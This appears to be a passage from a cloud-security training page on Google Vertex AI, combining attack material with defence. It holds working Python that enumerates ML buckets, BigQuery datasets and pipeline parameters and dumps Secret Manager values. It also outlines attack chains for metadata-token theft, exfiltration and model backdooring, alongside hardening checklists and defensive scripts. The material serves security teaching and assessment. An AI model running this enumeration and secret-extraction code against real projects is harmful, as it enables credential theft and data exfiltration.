        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
 
    resource = (
        f"projects/{project_id}/locations/{location}"
        f"/endpoints/{endpoint_id}"
    )
    url = (
        f"https://{location}-aiplatform.googleapis.com/v1/{resource}"
        f":getIamPolicy"
    )
    resp = requests.post(url, headers=headers, json={})
    policy = resp.json()
 
    findings = []
    for binding in policy.get('bindings', []):
        role = binding['role']
        members = binding['members']
 
        # Check for overly permissive access
        for member in members:
            if member in ('allUsers', 'allAuthenticatedUsers'):
                findings.append({
                    "severity": "CRITICAL",
                    "finding": f"Endpoint publicly accessible: "
                               f"{member} has {role}"
                })
            elif member.startswith('domain:'):
                findings.append({
                    "severity": "MEDIUM",
                    "finding": f"Domain-wide access: {member} has {role}"
                })
 
    return findings
 
# Also check for endpoints exposed via API Gateway or Cloud Endpoints
def check_api_gateway_exposure(token, project_id):
    """Check if Vertex AI endpoints are exposed via API Gateway."""
    headers = {"Authorization": f"Bearer {token}"}
    url = (
        f"https://apigateway.googleapis.com/v1/projects/{project_id}"
        f"/locations/-/apis"
    )
    resp = requests.get(url, headers=headers)
    for api in resp.json().get('apis', []):
        print(f"API Gateway: {api['displayName']} - {api['name']}")

3. Toegang tot GCS-trainingsdata

from google.cloud import storage
 
client = storage.Client()
 
# List buckets looking for ML data
for bucket in client.list_buckets():
    if any(kw in bucket.name.lower() for kw in ['ml', 'training', 'data', 'model', 'vertex']):
        print(f"\nBucket: {bucket.name}")
        blobs = list(bucket.list_blobs(max_results=10))
        for blob in blobs:
            print(f"  {blob.name} ({blob.size} bytes)")

Diepe GCS-enumeratie en ontdekking van gevoelige data

from google.cloud import storage
import json
 
client = storage.Client()
 
def enumerate_ml_buckets(client):
    """Comprehensive ML bucket discovery and content analysis."""
    ml_keywords = ['ml', 'training', 'data', 'model', 'vertex', 'pipeline',
                   'experiment', 'tensorboard', 'artifact', 'feature']
    sensitive_extensions = ['.csv', '.parquet', '.jsonl', '.pkl', '.pickle',
                           '.pt', '.pth', '.h5', '.pb', '.onnx']
 
    for bucket in client.list_buckets():
        # Check bucket name and labels
        is_ml = any(kw in bucket.name.lower() for kw in ml_keywords)
        labels = bucket.labels or {}
        is_ml = is_ml or any(kw in str(labels).lower() for kw in ml_keywords)
 
        if not is_ml:
            continue
 
        print(f"\n{'='*60}")
        print(f"Bucket: {bucket.name}")
        print(f"  Location: {bucket.location}")
        print(f"  Storage class: {bucket.storage_class}")
        print(f"  Labels: {labels}")
        print(f"  Versioning: {bucket.versioning_enabled}")
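        # public_access_prevention is a setting ('enforced' or 'inherited'),
        # not a yes/no answer to "is this bucket public?"
        print(f"  Public access prevention: {bucket.iam_configuration.public_access_prevention}")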
 
        # Check bucket IAM policy
        try:
            policy = bucket.get_iam_policy()
            for role, members in policy.items():
                for member in members:
                    if member in ('allUsers', 'allAuthenticatedUsers'):
                        print(f"  [CRITICAL] Public access: {member} -> {role}")
        except Exception as e:
            print(f"  Cannot read IAM: {e}")
 
        # Enumerate contents looking for sensitive data
        sensitive_files = []
        total_size = 0
        for blob in bucket.list_blobs(max_results=100):
            total_size += blob.size
            if any(blob.name.endswith(ext) for ext in sensitive_extensions):
                sensitive_files.append({
                    "name": blob.name,
                    "size": blob.size,
                    "updated": str(blob.updated)
                })
 
        print(f"  Total size (sampled): {total_size / 1e6:.1f} MB")
        if sensitive_files:
            print(f"  Sensitive files found: {len(sensitive_files)}")
            for f in sensitive_files[:10]:
                print(f"    {f['name']} ({f['size']} bytes)")
 
# Also check BigQuery datasets (common for feature stores)
def check_bigquery_datasets(token, project_id):
    """Enumerate BigQuery datasets that may contain ML features or training data."""
    import requests
    headers = {"Authorization": f"Bearer {token}"}
    url = f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets"
    resp = requests.get(url, headers=headers)
    for ds in resp.json().get('datasets', []):
        ds_ref = ds['datasetReference']
        print(f"BigQuery dataset: {ds_ref['datasetId']}")
        # Check for ML-related tables
        tables_url = (
            f"https://bigquery.googleapis.com/bigquery/v2/projects/"
            f"{project_id}/datasets/{ds_ref['datasetId']}/tables"
        )
        tables = requests.get(tables_url, headers=headers).json()
        for table in tables.get('tables', []):
            print(f"  Table: {table['tableReference']['tableId']}")

4. Pipeline artifact extraction

from google.cloud import aiplatform
 
# List pipeline runs and their artifacts
for run in aiplatform.PipelineJob.list():
    print(f"Pipeline: {run.display_name}")
    print(f"  State: {run.state}")
    print(f"  Created: {run.create_time}")
    # Pipeline artifacts contain model files, metrics, and parameters
    for detail in run.task_details:
        print(f"  Task: {detail.task_name}")
        for artifact in detail.outputs.values():
            print(f"    Output: {artifact}")

Pipeline template and configuration extraction

from google.cloud import aiplatform
import json
 
def extract_pipeline_details(project_id, location):
    """Extract pipeline templates and configurations that reveal
    the full ML workflow."""
    aiplatform.init(project=project_id, location=location)
 
    for run in aiplatform.PipelineJob.list():
        print(f"\n{'='*60}")
        print(f"Pipeline: {run.display_name}")
        print(f"  State: {run.state}")
        print(f"  Service Account: {run.service_account}")
        print(f"  Network: {run.network}")
 
        # Extract pipeline spec (the workflow definition)
        if hasattr(run, 'pipeline_spec'):
            spec = run.pipeline_spec
            # Pipeline specs reveal component images, input/output locations,
            # and the full data flow
            if 'components' in spec:
                for comp_name, comp in spec['components'].items():
                    print(f"  Component: {comp_name}")
                    if 'executorLabel' in comp:
                        print(f"    Executor: {comp['executorLabel']}")
 
        # Extract runtime parameters (may contain sensitive values)
        if hasattr(run, 'runtime_config'):
            config = run.runtime_config
            if 'parameters' in config:
                for param_name, param_value in config['parameters'].items():
                    value_str = str(param_value)[:100]
                    print(f"  Param: {param_name} = {value_str}")
                    if any(kw in param_name.lower() for kw in
                           ['key', 'secret', 'token', 'password']):
                        print(f"    [!] Potentially sensitive parameter")
 
    # Also check Vertex AI Metadata Store for experiment tracking
    print("\n=== Metadata Store (Experiments) ===")
    for experiment in aiplatform.Experiment.list():
        print(f"Experiment: {experiment.name}")

5. Secret Manager exploitation

GCP Secret Manager is the recommended way to store credentials, but Vertex AI service accounts may have overly broad access to secrets, well beyond what ML workflows require.

import requests
 
def enumerate_secrets(token, project_id):
    """Enumerate and attempt to access Secret Manager secrets."""
    headers = {"Authorization": f"Bearer {token}"}
 
    # List all secrets
    url = (
        f"https://secretmanager.googleapis.com/v1/projects/{project_id}"
        f"/secrets"
    )
    resp = requests.get(url, headers=headers)
    secrets = resp.json().get('secrets', [])
 
    for secret in secrets:
        secret_name = secret['name'].split('/')[-1]
        print(f"\nSecret: {secret_name}")
        print(f"  Created: {secret.get('createTime')}")
        labels = secret.get('labels', {})
        print(f"  Labels: {labels}")
 
        # Attempt to access the latest version
        version_url = (
            f"https://secretmanager.googleapis.com/v1/"
            f"{secret['name']}/versions/latest:access"
        )
        version_resp = requests.get(version_url, headers=headers)
        if version_resp.status_code == 200:
            import base64
            payload = version_resp.json()['payload']['data']
            decoded = base64.b64decode(payload).decode('utf-8', errors='replace')
            print(f"  [!] Accessible - Value: {decoded[:50]}...")
        else:
            print(f"  Access denied ({version_resp.status_code})")

Defensive assessment checklist

Control area	What to verify	MITRE ATLAS reference
Service accounts	Least-privilege roles, no `Editor` or `Owner` on Workbench SAs	AML.T0003 (ML Model Access)
Metadata server	Custom metadata attributes contain no secrets	AML.TA0008 (Collection)
Network	VPC Service Controls, Private Google Access, no public IPs on Workbench	AML.T0002 (Active Scanning)
GCS	Uniform bucket-level access, no `allUsers` bindings, encryption	AML.T0000 (Search for Data)
Endpoints	IAM authentication only, no public access bindings	AML.T0003 (ML Model Access)
Secrets	Scoped Secret Manager access, audit logging	AML.TA0008 (Collection)
Pipelines	Pipeline SA separate from Workbench SA, no secrets in parameters	AML.T0018 (Backdoor ML Model)
Logging	Cloud Audit Logs enabled, Data Access logs for GCS and BigQuery	AML.TA0006 (Defense Evasion)
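
The service account row of the checklist can be checked offline against an exported IAM policy. The sketch below assumes the policy has the JSON shape returned by `gcloud projects get-iam-policy PROJECT_ID --format=json`. The function name, the example project, and the account emails are hypothetical and serve only as illustration.

```python
# Sketch: flag service accounts that hold basic roles (Owner/Editor)
# in a project IAM policy exported as JSON.
BASIC_ROLES = {"roles/owner", "roles/editor"}


def find_overprivileged_service_accounts(policy):
    """Return sorted (member, role) pairs where a service account has a basic role."""
    findings = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        if role not in BASIC_ROLES:
            continue
        for member in binding.get("members", []):
            # Only service accounts are of interest here, not users or groups
            if member.startswith("serviceAccount:"):
                findings.append((member, role))
    return sorted(findings)


# Hypothetical policy, for illustration only
example_policy = {
    "bindings": [
        {
            "role": "roles/editor",
            "members": [
                "serviceAccount:workbench-sa@example-project.iam.gserviceaccount.com",
                "user:alice@example.com",
            ],
        },
        {
            "role": "roles/aiplatform.user",
            "members": [
                "serviceAccount:pipeline-sa@example-project.iam.gserviceaccount.com",
            ],
        },
    ]
}

for member, role in find_overprivileged_service_accounts(example_policy):
    print(f"[HIGH] {member} holds {role}")
```

The check only looks at project-level bindings. Roles inherited from a folder or organization, and custom roles with equally broad permissions, would need a separate pass.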

Recommended hardening

Use dedicated service accounts per Workbench instance with only the IAM roles required for that user's work, never Editor or Owner.
Enable VPC Service Controls to create a security perimeter around ML resources, which blocks data exfiltration to destinations outside the perimeter even when the attacker holds valid credentials.
Use Workload Identity Federation instead of service account keys where possible.
Enable Cloud Audit Logs with Data Access logging for GCS, BigQuery, and Vertex AI API calls.
Remove public IPs from Workbench instances and use IAP (Identity-Aware Proxy) tunnels for access.
Enforce organization policies such as constraints/iam.disableServiceAccountKeyCreation and constraints/compute.requireShieldedVm.
Use Customer-Managed Encryption Keys (CMEK) for GCS buckets, BigQuery datasets, and Vertex AI resources.
Implement VPC-SC ingress/egress rules to restrict which identities and services can access the ML perimeter.
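
Whether Data Access logging is actually enabled can be read from the `auditConfigs` section of a project IAM policy. The following is a minimal sketch under that assumption. The function name and the example policy are hypothetical, and exempted members are deliberately ignored to keep the example short.

```python
# Sketch: report which Data Access log types are missing per service,
# based on the auditConfigs section of an exported IAM policy.
REQUIRED_LOG_TYPES = {"DATA_READ", "DATA_WRITE"}


def missing_data_access_logs(policy, services):
    """Map each service to the sorted list of required log types not enabled."""
    enabled = {}
    for cfg in policy.get("auditConfigs", []):
        types = {c.get("logType") for c in cfg.get("auditLogConfigs", [])}
        enabled.setdefault(cfg.get("service"), set()).update(types)

    # A config for "allServices" applies to every service in the project
    everywhere = enabled.get("allServices", set())

    gaps = {}
    for service in services:
        have = everywhere | enabled.get(service, set())
        missing = REQUIRED_LOG_TYPES - have
        if missing:
            gaps[service] = sorted(missing)
    return gaps


# Hypothetical policy fragment, for illustration only
example_policy = {
    "auditConfigs": [
        {
            "service": "storage.googleapis.com",
            "auditLogConfigs": [
                {"logType": "ADMIN_READ"},
                {"logType": "DATA_READ"},
            ],
        }
    ]
}

gaps = missing_data_access_logs(
    example_policy,
    ["storage.googleapis.com", "aiplatform.googleapis.com"],
)
for service, missing in gaps.items():
    print(f"{service}: missing {', '.join(missing)}")
```

An empty result means both log types are configured for every listed service. It does not prove that the logs are retained or monitored.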

Common attack chains

Chain 1: From Workbench to project takeover

1. Initial access via compromised user credentials or malicious notebook
2. Extract service account token from GCP metadata server
3. Discover the SA has Editor role on the project (common misconfiguration)
4. Enumerate all project resources: GCS, BigQuery, Compute Engine, GKE
5. Access Secret Manager to extract API keys and database credentials
6. Test service account impersonation for SAs in other projects
7. If impersonation succeeds, pivot to other projects in the organization

Chain 2: Pipeline-based data exfiltration

1. Access Vertex AI Pipelines via compromised service account
2. Extract pipeline templates to understand data flow
3. Identify GCS buckets and BigQuery tables used for training data
4. Access training datasets containing PII or proprietary data
5. Exfiltrate data to attacker-controlled GCS bucket (if VPC-SC absent)
6. Use extracted data for model replication or competitive intelligence

Chain 3: Model artifact manipulation

1. Enumerate GCS buckets containing model artifacts
2. Download the production model artifact
3. Inject a backdoor (e.g., trojan trigger in the model weights)
4. Upload modified artifact to the same GCS path
5. If model versioning is not enforced, the next deployment loads the
   backdoored model
6. Backdoor activates on specific trigger inputs in production
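
One way to break Chain 3 at step 5 is to verify a digest of the artifact before it is deployed. The sketch below assumes that a SHA-256 digest was recorded at training time and stored somewhere the attacker cannot write, for example outside the bucket. That storage location, the helper names, and the sample bytes are assumptions made for illustration.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Hex-encoded SHA-256 digest of an artifact's bytes."""
    return hashlib.sha256(data).hexdigest()


def verify_artifact(data: bytes, expected_sha256: str) -> bool:
    """Compare the actual digest with the recorded one in constant time."""
    return hmac.compare_digest(sha256_hex(data), expected_sha256.lower())


# Illustration only: in practice the bytes would be downloaded from the
# GCS object and the digest read from a manifest kept outside the bucket.
original = b"model-weights-v1"
recorded_digest = sha256_hex(original)        # recorded at training time
tampered = original + b"<injected payload>"   # stands in for a backdoored file

print(verify_artifact(original, recorded_digest))
print(verify_artifact(tampered, recorded_digest))
```

The check is only as strong as the protection of the recorded digest. If the manifest lives in the same bucket as the model, an attacker with write access can replace both.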

GCP-specific risks

GCP presents several distinctive risks compared with AWS and Azure in the context of ML security:

GCP-specific risk	Description	Mitigation
Default Compute Engine SA	Vertex AI may use the default CE service account, which often holds `Editor` on the project	Create dedicated SAs with minimal roles
Organization policy gaps	Organization policies may not cover Vertex AI-specific resources	Extend organization policies to cover `aiplatform.*` constraints
VPC-SC complexity	VPC Service Controls are powerful but complex; misconfigured perimeters create a false sense of security	Audit the VPC-SC configuration regularly
BigQuery integration	Vertex AI Feature Store uses BigQuery, which may also contain sensitive non-ML data	Use separate BigQuery datasets for ML features
Shared Artifact Registry repos	ML container images may share repos with non-ML containers	Use dedicated repos for ML images with strict IAM
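
The first risk in the table is easy to detect, because the default Compute Engine service account follows a fixed email pattern: `PROJECT_NUMBER-compute@developer.gserviceaccount.com`. The following sketch checks an email against that pattern. The function name and the sample addresses are hypothetical.

```python
import re

# The default Compute Engine service account is named after the project number
DEFAULT_CE_SA = re.compile(r"^\d+-compute@developer\.gserviceaccount\.com$")


def uses_default_compute_sa(email: str) -> bool:
    """True if the email matches the default Compute Engine SA pattern."""
    return bool(DEFAULT_CE_SA.match(email.strip().lower()))


# Hypothetical service account emails, for illustration only
candidates = [
    "123456789012-compute@developer.gserviceaccount.com",
    "workbench-sa@example-project.iam.gserviceaccount.com",
]

for email in candidates:
    flag = "[!] default CE SA" if uses_default_compute_sa(email) else "dedicated SA"
    print(f"{email}: {flag}")
```

The email could come from the metadata server or from the service account field of a Workbench instance, training job, or pipeline run. A match is a prompt to review the account's roles, not proof that it holds `Editor`.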

MITRE ATLAS mapping for Vertex AI attacks

Attack technique	ATLAS ID	Vertex AI-specific context
Token extraction via metadata server	AML.TA0002 (Initial Access)	Workbench service account with broad project access
GCS data enumeration	AML.T0000 (Search for Victim's Data)	ML buckets are discoverable through labels and naming
Endpoint probing	AML.T0002 (Active Scanning)	Vertex AI endpoints may have public IAM bindings
Model extraction via prediction API	AML.T0024 (Model Extraction)	High-query-volume attacks through Vertex AI Prediction
Pipeline artifact manipulation	AML.T0018 (Backdoor ML Model)	GCS model artifacts are modifiable if bucket IAM is weak
Feature Store poisoning	AML.T0020 (Data Poisoning)	Modification of BigQuery/Bigtable feature data

Related topics

Cloud AI infrastructure -- Cross-platform overview
AWS SageMaker -- AWS comparison
Azure ML -- Azure comparison


Knowledge Check

What is the primary lateral movement path from a compromised Vertex AI Workbench instance?
